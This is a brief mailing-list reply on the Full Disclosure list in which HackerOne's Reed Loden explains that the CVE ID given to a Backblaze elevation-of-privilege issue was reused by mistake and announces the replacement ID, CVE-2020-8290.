Date: Tue, 22 Dec 2020 01:51:48 -0800
From: Reed Loden <reed@...dloden.com>
To: Jason Geffner <geffner@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD]
	CVE-2020-8152 – Elevation of Privilege in Backblaze

Due to a process fail, this CVE ID was accidentally reused for another
vulnerability.

The updated CVE ID for this issue is CVE-2020-8290.

We apologize to Jason and others for the inconvenience caused by this error.

Happy holidays,
~reed
(for HackerOne)